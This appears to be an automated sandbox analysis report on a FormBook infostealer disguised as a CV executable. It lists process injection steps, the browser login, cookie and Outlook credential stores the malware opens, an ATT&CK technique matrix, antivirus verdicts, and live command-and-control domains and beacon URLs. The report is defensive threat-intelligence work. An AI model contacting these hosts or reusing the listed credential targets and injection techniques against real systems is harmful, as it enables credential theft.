            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"Jump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeProcess created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeQueries volume information: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\TSTheme.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		412
            Process Injection            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447923 Sample: Curriculum Vitae Catalina M... Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 28 www.gett.hu 2->28 30 www.friendsfavorites.pet 2->30 32 18 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Multi AV Scanner detection for domain / URL 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 8 other signatures 2->48 10 Curriculum Vitae Catalina Munoz.exe 2 2->10         started        signatures3 process4 signatures5 60 Injects a PE file into a foreign processes 10->60 13 Curriculum Vitae Catalina Munoz.exe 10->13         started        process6 signatures7 62 Maps a DLL or memory area into another process 13->62 16 OZCzxhvCDDlUqJnCoH.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 TSTheme.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 2 other signatures 19->56 22 OZCzxhvCDDlUqJnCoH.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.crxwdix.store 124.156.151.111, 49710, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 22->34 36 www.getmall.online 203.161.43.228, 49744, 49745, 49746 VNPT-AS-VNVNPTCorpVN Malaysia 22->36 38 10 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Curriculum Vitae Catalina Munoz.exe63%ReversingLabsWin32.Trojan.Leonem
            Curriculum Vitae Catalina Munoz.exe57%VirustotalBrowse
            Curriculum Vitae Catalina Munoz.exe100%AviraHEUR/AGEN.1323686
            Curriculum Vitae Catalina Munoz.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            duobao698.com5%VirustotalBrowse
            www.botcsllc.com0%VirustotalBrowse
            gett.hu5%VirustotalBrowse
            www.drdavidglassman.com0%VirustotalBrowse
            featuringnature.de0%VirustotalBrowse
            www.duobao698.com1%VirustotalBrowse
            emgeecontracting.shop1%VirustotalBrowse
            www.lets-goo.ru1%VirustotalBrowse
            www.emgeecontracting.shop0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://push.zhanzhang.baidu.com/push.js0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://zz.bdstatic.com/linksubmit/push.js0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://reg.ru0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.instagram.com/hover_domains0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.uqdr.cn/yfa0/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.uqdr.cn/yfa0/0%VirustotalBrowse
            http://www.duobao698.com/ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y100%Avira URL Cloudmalware
            https://www.reg.ru/domain/new/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
            http://www.gett.hu/1df8/100%Avira URL Cloudmalware
            https://reg.ru0%VirustotalBrowse
            http://www.gett.hu/1df8/1%VirustotalBrowse
            https://www.instagram.com/hover_domains0%VirustotalBrowse
            http://www.emgeecontracting.shop/o2z4/0%Avira URL Cloudsafe
            http://www.kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            http://www.drdavidglassman.com/61qh/100%Avira URL Cloudmalware
            http://www.shengniu.com0%Avira URL Cloudsafe
            http://www.theppelin.online/zxqv/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.emgeecontracting.shop/o2z4/0%VirustotalBrowse
            http://www.emgeecontracting.shop/o2z4/?4h=o4btfdz60D114qnlpPkAL4ysHPNnnpnlNvMaE18djeqdyh8JxI4to+dkcTQv5jDwTFNUiMSIZUwmUqoSbZzkAVBLptEej4dkSw0Rp5qMw46dSxiTGxGYdrzYQnQsEiM3dvL1u5YQIt8O&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            https://www.hover.com/domains/results0%Avira URL Cloudsafe
            http://www.shengniu.com/wy0r/0%Avira URL Cloudsafe
            http://www.lets-goo.ru/jcz4/100%Avira URL Cloudmalware
            http://www.theppelin.online/zxqv/0%VirustotalBrowse
            http://www.friendsfavorites.pet/faug/0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            https://www.reg.ru/web-sites/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land0%Avira URL Cloudsafe
            https://www.hover.com/domains/results0%VirustotalBrowse
            http://www.drdavidglassman.com/61qh/7%VirustotalBrowse
            http://www.duobao698.com/ff4v/100%Avira URL Cloudmalware
            http://www.shengniu.com/wy0r/0%VirustotalBrowse
            http://www.lets-goo.ru/jcz4/1%VirustotalBrowse
            http://www.kernelphysics.com/w912/0%Avira URL Cloudsafe
            http://www.friendsfavorites.pet/faug/0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.kohfour.com/nsxv/0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.theppelin.online&utm_medium=parking&utm0%Avira URL Cloudsafe
            http://www.botcsllc.com/xvcs/?4h=C9I48TAnIDWUJjArfDMWJdViUh6nNPGow05e1uC1tfhZsbhFFmHmX4wCjHXOtJR+EmF88tR6GQ9yogFnvhAEpy/ktKFnGfRg/4wLMWSu7Ir3MPWPBJr4ouRSVqpeqHbqcPt/HmBjByDG&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            https://twitter.com/hover0%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.theppelin.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            http://www.duobao698.com/ff4v/5%VirustotalBrowse
            http://www.kernelphysics.com/w912/0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://www.reg.ru/dedicated/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land0%Avira URL Cloudsafe
            http://www.getmall.online/sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land_h0%Avira URL Cloudsafe
            http://www.drdavidglassman.com/61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y100%Avira URL Cloudmalware
            https://twitter.com/hover0%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.crxwdix.store/y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            http://www.botcsllc.com/xvcs/0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.theppelin.online&rand=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.lets-goo.ru/jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y100%Avira URL Cloudmalware
            http://www.kohfour.com/nsxv/1%VirustotalBrowse
            http://www.featuringnature.de/arkx/0%Avira URL Cloudsafe
            http://www.friendsfavorites.pet/faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            http://www.botcsllc.com/xvcs/0%VirustotalBrowse
            http://www.getmall.online/sdqf/0%Avira URL Cloudsafe
            http://www.kohfour.com/nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%VirustotalBrowse
            http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA0%Avira URL Cloudsafe
            http://www.featuringnature.de/arkx/0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            duobao698.com
            		3.33.130.190
            		truefalseunknown
            www.botcsllc.com
            		216.40.34.41
            		truefalseunknown
            www.uqdr.cn
            		188.114.96.3
            		truefalse
              		unknown
              www.crxwdix.store
              		124.156.151.111
              		truetrue
                		unknown
                www.theppelin.online
                		194.58.112.174
                		truefalse
                  		unknown
                  www.getmall.online
                  		203.161.43.228
                  		truefalse
                    		unknown
                    gett.hu
                    		193.201.190.93
                    		truefalseunknown
                    www.kohfour.com
                    		216.40.34.41
                    		truefalse
                      		unknown
                      www.drdavidglassman.com
                      		199.59.243.225
                      		truefalseunknown
                      94950.bodis.com
                      		199.59.243.225
                      		truefalse
                        		unknown
                        featuringnature.de
                        		3.33.130.190
                        		truefalseunknown
                        www.shengniu.com
                        		152.32.189.143
                        		truefalse
                          		unknown
                          www.kernelphysics.com
                          		45.64.187.212
                          		truefalse
                            		unknown
                            www.lets-goo.ru
                            		104.21.81.245
                            		truefalseunknown
                            emgeecontracting.shop
                            		69.57.162.24
                            		truefalseunknown
                            www.duobao698.com
                            		unknown
                            		unknowntrueunknown
                            www.gett.hu
                            		unknown
                            		unknowntrue
                              		unknown
                              www.emgeecontracting.shop
                              		unknown
                              		unknowntrueunknown
                              www.friendsfavorites.pet
                              		unknown
                              		unknowntrue
                                		unknown
                                www.featuringnature.de
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.uqdr.cn/yfa0/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.duobao698.com/ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.gett.hu/1df8/false
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.emgeecontracting.shop/o2z4/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.drdavidglassman.com/61qh/false
                                  • 7%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.theppelin.online/zxqv/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.emgeecontracting.shop/o2z4/?4h=o4btfdz60D114qnlpPkAL4ysHPNnnpnlNvMaE18djeqdyh8JxI4to+dkcTQv5jDwTFNUiMSIZUwmUqoSbZzkAVBLptEej4dkSw0Rp5qMw46dSxiTGxGYdrzYQnQsEiM3dvL1u5YQIt8O&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.shengniu.com/wy0r/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.lets-goo.ru/jcz4/false
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.friendsfavorites.pet/faug/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.duobao698.com/ff4v/false
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.kernelphysics.com/w912/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.kohfour.com/nsxv/false
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.botcsllc.com/xvcs/?4h=C9I48TAnIDWUJjArfDMWJdViUh6nNPGow05e1uC1tfhZsbhFFmHmX4wCjHXOtJR+EmF88tR6GQ9yogFnvhAEpy/ktKFnGfRg/4wLMWSu7Ir3MPWPBJr4ouRSVqpeqHbqcPt/HmBjByDG&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.getmall.online/sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.drdavidglassman.com/61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.crxwdix.store/y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Ytrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.botcsllc.com/xvcs/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.lets-goo.ru/jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.featuringnature.de/arkx/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.friendsfavorites.pet/faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.kohfour.com/nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Yfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.getmall.online/sdqf/false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabTSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
